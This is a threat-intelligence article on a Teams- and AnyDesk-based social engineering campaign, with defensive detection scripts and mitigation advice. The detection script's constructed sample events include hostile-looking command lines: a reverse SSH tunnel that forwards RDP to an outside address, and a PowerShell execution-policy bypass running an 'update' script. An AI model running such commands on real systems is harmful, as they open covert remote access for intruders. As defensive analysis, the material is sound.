On June 20, 2024, security researchers identified multiple intrusion attempts by threat actors whose tactics, techniques, and procedures (TTPs) are consistent with an ongoing social engineering campaign in which Microsoft Teams and the AnyDesk remote access tool play central roles.
While investigating this aggressive campaign, the researchers observed significant evolution in the tools and payloads the threat actors used.
AnyDesk and Microsoft Teams Misused By Hackers
Researchers from Rapid7 observed that the campaign begins with an email bomb (flooding the victim's inbox with unwanted mail), followed by a phone call to the victim over Microsoft Teams. The threat actor then convinces the user to download and install AnyDesk, a legitimate remote access tool that gives the adversary interactive control of the user's computer. Once that control is established, the threat actor executes payloads on the system and exfiltrates stolen data.
In some cases the adversary has used credential harvesting tools, such as a 32-bit .NET executable named AntiSpam.exe. The program poses as a spam filter updater and prompts the user to enter their credentials in a pop-up window; the entered credentials are written to disk together with system enumeration output. The executable has changed across versions, indicating active development.
After credential harvesting, the threat actors executed a series of binaries and PowerShell scripts to establish a connection to their command and control (C2) servers. The follow-on payloads carried names such as update1.exe, update4.exe, and update7.ps1, consistent with the "update" theme of the social engineering lure.
Payloads and Technical Analysis
These payloads include SystemBC malware, which acts as a dropper and SOCKS proxy; Golang HTTP beacons, which appear to serve as a C2 framework; SOCKS proxy beacons, which route connections through the compromised host; and a Beacon Object File (BOF) converted from a Cobalt Strike module into a standalone executable. Of note, the payload update6.exe attempts to exploit CVE-2022-26923, the Active Directory Certificate Services privilege escalation flaw that Microsoft patched in May 2022, to add a machine account, which the threat actor can then use for Kerberoasting. Adding that machine account in the first place depends on the domain's ms-DS-MachineAccountQuota attribute, which defaults to 10 and allows ordinary users to join machines; setting it to 0 and confirming that the May 2022 updates are installed on certificate authorities and domain controllers closes both halves of that step.
In addition, the researchers observed the use of reverse SSH tunnels and the Level remote monitoring and management (RMM) tool to move laterally and retain access within compromised environments.
Analysis of several of the compiled payloads shows that many were signed with the same code-signing certificate, which makes that certificate a useful pivot when hunting for related samples. The analysis of AntiSpam.exe, update1.exe, update2.dll, and update4.exe illustrates the techniques the threat actors employ:
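The chain described above (an unapproved RMM agent, a fake spam-filter binary spawning enumeration commands, "update" named follow-on payloads, and a reverse SSH tunnel) can be triaged from ordinary process-creation telemetry. The following script is an added example, not code from Rapid7 or Cyble: it runs four narrow rules over constructed Sysmon-style events and ranks hosts by how many distinct rules fired, since one rule alone is likely noise while several on the same host is the chain. The RMM allowlist and watchlist, the host names, and the events themselves are assumptions for illustration; the allowlist also doubles as a starting point for the unapproved-RMM control recommended in the conclusion.

```python
"""Added example (not Rapid7's or Cyble's code): triage Windows process-creation
events for the AnyDesk / AntiSpam.exe / update<N> chain. All events are constructed."""
import re
from collections import defaultdict
from dataclasses import dataclass

# Assumed allowlist of RMM agents this organisation sanctions; adjust to yours.
APPROVED_RMM = {"teamviewer.exe"}
# Assumed watchlist of RMM agent binaries to compare against the allowlist.
KNOWN_RMM = {"anydesk.exe", "teamviewer.exe", "screenconnect.clientservice.exe"}
# Lure naming reported in the campaign: update<N>.exe / .dll / .ps1.
LURE_RE = re.compile(r"\bupdate\d+\.(?:exe|dll|ps1)\b", re.IGNORECASE)
# An OpenSSH remote port forward (ssh -R ...) is the reverse tunnel primitive.
REVERSE_SSH_RE = re.compile(r"(?:^|\s)-R\s+\S+")


@dataclass(frozen=True)
class Event:
    host: str
    parent_image: str
    image: str
    command_line: str


@dataclass(frozen=True)
class Finding:
    host: str
    rule: str
    detail: str


def basename(path: str) -> str:
    """Lower-cased file name of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def detect(events):
    """Apply four narrow rules to each event and return the matches."""
    findings = []
    for ev in events:
        img, parent = basename(ev.image), basename(ev.parent_image)
        if img in KNOWN_RMM and img not in APPROVED_RMM:
            findings.append(Finding(ev.host, "unapproved_rmm", ev.image))
        lure = LURE_RE.search(ev.command_line) or LURE_RE.search(img)
        if lure:
            findings.append(Finding(ev.host, "update_lure_payload", lure.group(0)))
        if parent == "antispam.exe" and img == "cmd.exe":
            findings.append(Finding(ev.host, "harvester_enumeration", ev.command_line))
        if img == "ssh.exe" and REVERSE_SSH_RE.search(ev.command_line):
            findings.append(Finding(ev.host, "reverse_ssh_tunnel", ev.command_line))
    return findings


def hosts_by_rule_count(findings):
    """Hosts ranked by how many distinct rules fired: several rules on one host
    is the chain, a single hit is more likely noise worth a second look."""
    rules = defaultdict(set)
    for f in findings:
        rules[f.host].add(f.rule)
    return {h: len(r) for h, r in sorted(rules.items(), key=lambda kv: -len(kv[1]))}


# Constructed sample: WS01 shows the full chain, WS02 a reverse tunnel, WS03 is benign.
SAMPLE_EVENTS = [
    Event("WS01", r"C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE",
          r"C:\Users\jdoe\Downloads\AnyDesk.exe", "AnyDesk.exe"),
    Event("WS01", r"C:\Users\jdoe\Downloads\AnyDesk.exe",
          r"C:\Users\jdoe\AppData\Local\Temp\AntiSpam.exe", "AntiSpam.exe"),
    Event("WS01", r"C:\Users\jdoe\AppData\Local\Temp\AntiSpam.exe",
          r"C:\Windows\System32\cmd.exe", "cmd.exe /c systeminfo"),
    Event("WS01", r"C:\Windows\System32\cmd.exe",
          r"C:\Users\jdoe\AppData\Local\Temp\update1.exe", "update1.exe"),
    Event("WS01", r"C:\Windows\System32\cmd.exe",
          r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
          r"powershell.exe -ep bypass -f C:\Users\jdoe\AppData\Local\Temp\update7.ps1"),
    Event("WS02", r"C:\Windows\System32\cmd.exe",
          r"C:\Windows\System32\OpenSSH\ssh.exe",
          "ssh.exe -N -R 9050:127.0.0.1:3389 user@203.0.113.10"),
    Event("WS03", r"C:\Windows\explorer.exe",
          r"C:\Program Files\TeamViewer\TeamViewer.exe", "TeamViewer.exe"),
    Event("WS03", r"C:\Windows\explorer.exe",
          r"C:\Windows\System32\notepad.exe", "notepad.exe"),
]

if __name__ == "__main__":
    found = detect(SAMPLE_EVENTS)
    for f in found:
        print(f"{f.host:5} {f.rule:22} {f.detail}")
    print(hosts_by_rule_count(found))
```

On the constructed sample this yields five findings, three distinct rules on WS01 and one on WS02. The rules are deliberately narrow so that they can be fed from an EDR export as-is; the Teams call and email bomb that start the chain leave no process event, so the first thing visible on the endpoint is the RMM install, which is why that rule carries the most weight.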
- AntiSpam.exe: This payload allocates a console window to display messages to the user and prints a fake progress loop 1023 times to it. It then prompts the user for their credentials and checks them with the .NET ValidateCredentials method (a live check against the domain), so mistyped passwords are rejected and only working credentials are captured. The payload also runs enumeration commands via cmd.exe and saves the output to a file.
- update1.exe: This payload poses as an installer for Yandex Disk but in fact loads, decrypts, and executes a second executable stored in an embedded resource, using local PE injection.
- update2.dll: This payload poses as an AMD DirectX driver library and loads a second-stage executable via local PE injection. The second stage contacts several C2 addresses using a Golang HTTP library.
- update4.exe: This payload appears to be a copy of APEX Scan, an antivirus scanner made by Trend Micro.
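Both update1.exe and update2.dll carry their real payload as a second PE inside the host binary. A quick triage step for that shape of dropper is to scan the file for embedded PE headers: every "MZ" whose e_lfanew field points at a valid "PE\0\0" signature, reporting the offset, target architecture, and format. The scanner below is an added example written for this article, not code from Rapid7 or Cyble, and needs only the standard library; the header-only sample it scans is fabricated by the `build_min_pe` helper and is not a real binary. Note the caveat from the update1.exe description: a stage that is stored encrypted will not be found on disk, so run the scan over a memory dump taken after the dropper has decrypted and injected it.

```python
"""Added example (not Rapid7's or Cyble's code): locate PE images embedded inside
another file, the dropper shape that update1.exe and update2.dll represent."""
import struct
import sys

MACHINE_NAMES = {0x14C: "i386", 0x8664: "amd64", 0xAA64: "arm64"}


def find_embedded_pe(data: bytes, start: int = 1):
    """Return every offset in `data` where an MZ header's e_lfanew points at a
    valid PE signature. start=1 skips the outer file's own header at offset 0."""
    hits = []
    pos = data.find(b"MZ", start)
    while pos != -1:
        if pos + 0x40 <= len(data):
            e_lfanew = struct.unpack_from("<I", data, pos + 0x3C)[0]
            pe = pos + e_lfanew
            # Heuristic bounds: a genuine e_lfanew is small, and the buffer must
            # hold the 20-byte COFF header plus the optional-header magic word.
            if (0x40 <= e_lfanew <= 0x400 and pe + 26 <= len(data)
                    and data[pe:pe + 4] == b"PE\0\0"):
                machine, nsections = struct.unpack_from("<HH", data, pe + 4)
                size_opt = struct.unpack_from("<H", data, pe + 20)[0]
                magic = struct.unpack_from("<H", data, pe + 24)[0] if size_opt >= 2 else 0
                hits.append({
                    "offset": pos,
                    "machine": MACHINE_NAMES.get(machine, hex(machine)),
                    "sections": nsections,
                    "format": {0x10B: "PE32", 0x20B: "PE32+"}.get(magic, "unknown"),
                })
        pos = data.find(b"MZ", pos + 1)
    return hits


def build_min_pe(machine: int, nsections: int, pe32plus: bool) -> bytes:
    """Fabricate a header-only PE (DOS header, PE signature, COFF header, optional
    header magic) for test input. It is not a runnable executable."""
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)  # e_lfanew: PE signature follows the DOS header
    coff = struct.pack("<HHIIIHH", machine, nsections, 0, 0, 0,
                       240 if pe32plus else 224, 0x22)  # SizeOfOptionalHeader, Characteristics
    magic = struct.pack("<H", 0x20B if pe32plus else 0x10B)
    return bytes(dos) + b"PE\0\0" + coff + magic


# Constructed sample: a 32-bit "dropper" carrying a 64-bit stage after padding and junk.
SAMPLE_DROPPER = (build_min_pe(0x14C, 3, False) + b"\x00" * 200 + b"junk"
                  + build_min_pe(0x8664, 4, True) + b"\x00" * 50)

if __name__ == "__main__":
    blob = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else SAMPLE_DROPPER
    for hit in find_embedded_pe(blob):
        print(f"embedded PE at 0x{hit['offset']:x}: {hit['format']} {hit['machine']}, "
              f"{hit['sections']} sections")
```

Run it with a file path to scan a real sample, or without arguments to scan the fabricated dropper, which reports one embedded PE32+ amd64 image at offset 294. The e_lfanew bound of 0x400 is a false-positive filter, not a rule of the format; raise it if a sample with an unusually long DOS stub is being missed.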
Conclusion
The threat actors behind this ongoing social engineering campaign have shown a willingness to adapt their techniques, shifting from credential harvesting batch scripts to a compiled .NET executable.
The following practices outlined by Cyble researchers form a first line of defence against these attackers.
- Prevent the execution of any unapproved RMM solutions within the environment, for example with an application control allowlist (AppLocker or Windows Defender Application Control).
- Block the domains associated with all unapproved RMM solutions at the proxy or DNS layer.
- Conduct regular security awareness and information security training so that staff can recognise and report common social engineering attacks, including unsolicited Teams calls that ask them to install remote access software.
- Keep your devices, operating systems, and applications updated.
- Use a reputable antivirus and internet security software package on your systems.